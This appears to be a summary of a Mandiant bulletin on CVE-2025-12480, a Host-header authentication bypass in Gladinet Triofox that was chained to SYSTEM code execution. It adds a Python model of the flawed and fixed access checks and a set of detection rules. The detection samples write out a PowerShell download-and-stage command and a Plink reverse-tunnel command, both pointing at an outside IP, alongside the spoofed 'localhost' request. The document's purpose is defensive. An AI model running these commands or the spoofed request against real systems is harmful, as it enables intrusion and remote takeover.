TL;DR

Mandiant reported exploitation of an unauthenticated access-control flaw in Gladinet's Triofox (CVE-2025-12480) that let attackers bypass authentication, create an admin account and run arbitrary code. The attackers chained a Host-header-based bypass with abuse of Triofox's anti-virus scanner configuration to execute a payload as SYSTEM and deploy remote-access tools.

What happened

Mandiant Threat Defense investigated activity on a customer Triofox server and traced it to an unauthenticated access-control defect in Gladinet's Triofox file-sharing platform. The flaw, tracked as CVE-2025-12480, stems from an access check that treats a request as local whenever its Host header equals "localhost". Because the server derives that value from the client-supplied header, a remote attacker can reach the initial setup pages (AdminDatabase.aspx and AdminAccount.aspx) simply by spoofing it.

Using this bypass the attacker completed the setup workflow to create a new native admin account, then abused the product's anti-virus configuration to point the scanner path at a malicious batch file. The configured scanner runs under the Triofox process account (SYSTEM in the observed environment), so the script executed with those privileges and launched a downloader that retrieved a disguised Zoho UEMS installer. The adversary then used that agent to install remote-access utilities and set up SSH tunnelling (via Plink/PuTTY) to forward RDP into the compromised host. Mandiant observed exploitation of Triofox version 16.4.10317.56372; Gladinet issued fixes in release 16.7.10368.56560, and Mandiant validated the remediation.

Why it matters

  • Unauthenticated bypass: The flaw permits remote actors to reach privileged setup pages without valid credentials by spoofing the HTTP Host header.
  • Escalation to SYSTEM: The anti-virus configuration accepts an arbitrary path, so an admin can point it at an attacker-controlled script or binary that then runs with the product's system-level privileges.
  • Persistent remote access: Attackers used legitimate management/agent software to deploy remote‑access tools, increasing the difficulty of detection and removal.
  • Network pivoting: SSH tunneling and RDP forwarding were used to allow external access into internal systems via the compromised host.

Key facts

  • CVE identifier: CVE-2025-12480.
  • Affected product: Gladinet Triofox; confirmed exploitation against version 16.4.10317.56372.
  • Fixed in Triofox release 16.7.10368.56560 (vendor-engaged with Mandiant and validated).
  • Earliest observed activity: Mandiant attributes the exploitation to a group tracked as UNC6485, with activity dating to at least Aug. 24, 2025 (per Google Threat Intelligence Group telemetry).
  • Root cause: access control check relied on Request.Url.Host equaling 'localhost', which can be spoofed via the HTTP Host header.
  • Attack chain: host‑header bypass → create admin account → set anti‑virus path to malicious script → script executed as SYSTEM → downloader installs Zoho UEMS agent.
  • Downloader behavior: a PowerShell command fetched a disguised executable from an external IP and saved it under C:\Windows\appcompat before execution.
  • Post‑compromise tools: Zoho Assist and AnyDesk were deployed; Plink/Putty binaries were used to build an SSH reverse tunnel to forward RDP.
  • Detection signals observed: an anomalous HTTP GET with a Referer containing localhost, file activity under C:\Windows\Temp, and specific command-line executions recorded by SecOps.
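The root cause described under "What happened" and in the Key facts list above, modelled as an added example. This is not Gladinet's code: it is a minimal stand-in for the access check as the bulletin describes it, placed next to a check that keys on the connection's peer address instead of the client-supplied Host header. The page names come from the write-up; the request shapes, addresses and the "fixed" variant are assumptions.

```python
"""Added example (not Gladinet's code): a minimal model of the access check
behind CVE-2025-12480 as the bulletin describes it, next to a check that
keys on the connection's peer address instead of the client-supplied Host
header. Page names come from the write-up; the request shapes are constructed."""
from dataclasses import dataclass, field
from ipaddress import ip_address

# Pages that sit behind the "is this request local?" gate, per the write-up.
SETUP_PAGES = {"/AdminDatabase.aspx", "/AdminAccount.aspx", "/InitAccount.aspx"}


@dataclass
class Request:
    path: str
    remote_addr: str                      # peer address of the TCP connection
    headers: dict = field(default_factory=dict)

    @property
    def url_host(self) -> str:
        # ASP.NET's Request.Url.Host is derived from the client's Host header,
        # so this value is whatever the client chose to send (case and port
        # are normalised away, as the server would).
        return self.headers.get("Host", "").split(":")[0].lower()


def can_run_critical_page_vulnerable(req: Request) -> bool:
    """The flawed decision the bulletin describes: 'local' means the Host
    header says localhost. Any remote client can send that header."""
    return req.url_host == "localhost"


def can_run_critical_page_fixed(req: Request) -> bool:
    """Hardened variant (an assumed fix, not Gladinet's actual patch): decide
    'local' from the peer address, which the client cannot forge, and ignore
    the Host header entirely. Behind a reverse proxy remote_addr is the
    proxy's address; do not substitute X-Forwarded-For, which is client data."""
    try:
        return ip_address(req.remote_addr).is_loopback
    except ValueError:
        return False


def handle(req: Request, check) -> int:
    """Return the HTTP status a request to a setup page gets under `check`."""
    if req.path not in SETUP_PAGES:
        return 404
    return 200 if check(req) else 403


# Constructed requests: a genuine local admin, a remote client spoofing
# Host: localhost, and a remote client sending the server's real hostname.
LOCAL_ADMIN = Request("/AdminDatabase.aspx", "127.0.0.1", {"Host": "localhost"})
SPOOFED_REMOTE = Request("/AdminDatabase.aspx", "203.0.113.7", {"Host": "LOCALHOST:80"})
HONEST_REMOTE = Request("/AdminDatabase.aspx", "203.0.113.7", {"Host": "files.example.com"})


def demo() -> dict:
    reqs = (LOCAL_ADMIN, SPOOFED_REMOTE, HONEST_REMOTE)
    return {
        "vulnerable": [handle(r, can_run_critical_page_vulnerable) for r in reqs],
        "fixed": [handle(r, can_run_critical_page_fixed) for r in reqs],
    }


if __name__ == "__main__":
    print(demo())  # {'vulnerable': [200, 200, 403], 'fixed': [200, 403, 403]}
```

The only difference between the second and third request is the Host header, which is exactly the attacker's lever; the vulnerable check admits the spoofed request and the peer-address check rejects it while still admitting the genuine loopback client. A stronger design, beyond what this model shows, is to disable the setup pages altogether once initial configuration has completed, so that no "local" heuristic is needed after first run.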

What to watch next

  • Monitor HTTP logs for requests with Host headers or Referer values referencing 'localhost' originating from external IPs.
  • Audit access to AdminDatabase.aspx, AdminAccount.aspx and InitAccount.aspx; unexpected successful accesses to these pages are an indicator of compromise.
  • Look for unusual anti‑virus configuration paths or scanner executables located under shared folders, and any execution of scripts from those paths.
  • Check for downloader activity matching the observed PowerShell pattern and for unexpected installations of management agents (Zoho UEMS) or presence of Plink/Putty binaries in temp directories.
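The watch items above, together with the detection signals in the Key facts list, as an added detection example. This is not from the Mandiant bulletin and is not Triofox code: three rules run over constructed data. The IIS W3C-style log lines, IP addresses (TEST-NET ranges), file names and command lines are made up for illustration; only the page names, the "localhost" Host/Referer signal, the C:\Windows\appcompat download directory and the Plink/PuTTY tooling come from the write-up, and the scanner-path heuristics are assumptions since the page does not say where Triofox stores that setting.

```python
"""Added detection example (not from the Mandiant bulletin, not Triofox code):
three rules for the CVE-2025-12480 chain run over constructed data. Log lines,
IP addresses, file names and command lines are made up; the page names, the
'localhost' signal, the C:\\Windows\\appcompat directory and the Plink/PuTTY
tooling are the indicators the write-up reports."""
import re
from ipaddress import ip_address

SETUP_PAGES = {"admindatabase.aspx", "adminaccount.aspx", "initaccount.aspx"}
SCRIPT_EXT = (".bat", ".cmd", ".ps1", ".vbs", ".js")
# Reported downloader shape: Invoke-WebRequest ... -OutFile C:\Windows\appcompat\...
DOWNLOADER_RE = re.compile(r"invoke-webrequest\b.*-outfile\s+['\"]?c:\\windows\\appcompat\\", re.I)
# Plink/PuTTY binaries executed out of a temp directory.
TUNNEL_RE = re.compile(r"\\temp\\\S*(?:plink|putty)\S*\.exe", re.I)


def parse_w3c(text):
    """Parse W3C extended log text: a '#Fields:' directive names the columns,
    other '#' lines are directives, every other line is a space-separated record."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records


def is_loopback(ip):
    try:
        return ip_address(ip).is_loopback
    except ValueError:
        return False


def flag_setup_page_access(rec):
    """Rule 1: a setup page requested by a non-loopback client that claims to be
    local via Host or Referer, or that actually received a 2xx.
    Returns (client, page, reasons) or None."""
    page = rec.get("cs-uri-stem", "").rsplit("/", 1)[-1].lower()
    if page not in SETUP_PAGES or is_loopback(rec.get("c-ip", "")):
        return None
    reasons = []
    if rec.get("cs-host", "").split(":")[0].lower() == "localhost":
        reasons.append("Host header spoofed to localhost")
    if "localhost" in rec.get("cs(Referer)", "").lower():
        reasons.append("Referer claims localhost")
    if rec.get("sc-status", "").startswith("2"):
        reasons.append("setup page served to a non-local client")
    return (rec["c-ip"], page, reasons) if reasons else None


def flag_command_line(cmd):
    """Rule 2: the reported downloader and tunnelling-tool patterns."""
    if DOWNLOADER_RE.search(cmd):
        return "PowerShell download into C:\\Windows\\appcompat"
    if TUNNEL_RE.search(cmd):
        return "Plink/PuTTY run from a temp directory"
    return None


def flag_scanner_path(path):
    """Rule 3 (assumed heuristics): the configured anti-virus scanner should be
    a binary in a program directory, not a script and not under a temp
    directory or a UNC share. Add the Triofox share root to UNSAFE_DIRS."""
    p = path.lower()
    if p.endswith(SCRIPT_EXT):
        return "scanner path is a script, not an AV binary"
    if p.startswith("\\\\") or any(d in p for d in UNSAFE_DIRS):
        return "scanner binary lives in a writable/shared location"
    return None


UNSAFE_DIRS = ("\\temp\\",)

# Constructed sample data (TEST-NET addresses, invented file names).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-host cs(Referer) sc-status
2025-08-24 13:02:11 203.0.113.7 GET /management/AdminDatabase.aspx localhost http://localhost/management/AdminDatabase.aspx 200
2025-08-24 13:02:45 203.0.113.7 POST /management/AdminAccount.aspx localhost - 200
2025-08-24 13:03:00 198.51.100.4 GET /portal/loginpage.aspx files.example.com - 200
2025-08-24 13:05:12 127.0.0.1 GET /management/InitAccount.aspx localhost - 200
"""
SAMPLE_COMMANDS = [
    r'powershell -c "Invoke-WebRequest -Uri http://203.0.113.9/setup.exe -OutFile C:\Windows\appcompat\setup.exe"',
    r"C:\Windows\Temp\plink.exe -ssh -R 3389:127.0.0.1:3389 user@203.0.113.9",
    r"C:\Program Files\Windows Defender\MpCmdRun.exe -Scan -ScanType 3 -File C:\Shares\doc.pdf",
]
SAMPLE_SCANNER_PATHS = [
    r"C:\Program Files\Windows Defender\MpCmdRun.exe",
    r"C:\Windows\Temp\scanner.bat",
    r"\\fileserver\tools\scan.exe",
]


def run_all():
    http_hits = [h for h in map(flag_setup_page_access, parse_w3c(SAMPLE_LOG)) if h]
    cmd_hits = [flag_command_line(c) for c in SAMPLE_COMMANDS]
    av_hits = [flag_scanner_path(p) for p in SAMPLE_SCANNER_PATHS]
    return http_hits, cmd_hits, av_hits


if __name__ == "__main__":
    for group in run_all():
        for hit in group:
            print(hit)
```

Rule 1 deliberately ignores the client's claimed origin for anything that is not a setup page, so it stays quiet on normal portal traffic, and it treats any 2xx to a setup page from a non-loopback client as a hit on its own: once the product is set up, nobody outside the box should be reaching those pages at all. Rule 1 needs the optional cs-host field enabled in IIS logging for the Host-header check; the Referer check works with the default field set.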

Quick glossary

  • Host header attack: When an attacker alters the HTTP Host header to influence server-side logic that relies on the header value for access control or routing.
  • Unauthenticated access vulnerability: A flaw that allows access to privileged functionality or data without providing valid credentials.
  • Remote code execution (RCE): The ability for an attacker to run arbitrary code on a target system, potentially at elevated privileges.
  • SSH tunneling / Plink: A method of forwarding network traffic over an SSH connection; Plink is a command-line SSH client used to establish such tunnels.
  • Endpoint management agent: Software installed on a host to provide centralized device management; attackers may abuse legitimate agents to run additional software remotely.

Reader FAQ

Has Gladinet released a fix for this issue?
Mandiant validated that the vulnerability is resolved in Triofox release 16.7.10368.56560.

Did attackers achieve code execution with system privileges?
Yes. The observed chain abused the anti‑virus configuration to execute a script under the Triofox process account, which ran as SYSTEM in the reported environment.

Was this exploited in the wild?
Yes. Mandiant observed exploitation by an activity cluster tracked as UNC6485, with activity dating to at least Aug. 24, 2025.

Are all Triofox versions affected?
Only version 16.4.10317.56372 was specifically referenced as vulnerable in the report; other versions are not confirmed in the source.

How were remote‑access tools delivered?
The attackers downloaded a disguised installer from the URL and to the path given in the report, and used the resulting agent to deploy Zoho Assist and AnyDesk, per the investigation.

Written by: Stallone D'Souza, Praveeth DSouza, Bill Glynn, Kevin O'Flynn, Yash Gupta (Mandiant Threat Defense, Frontline Bulletin series)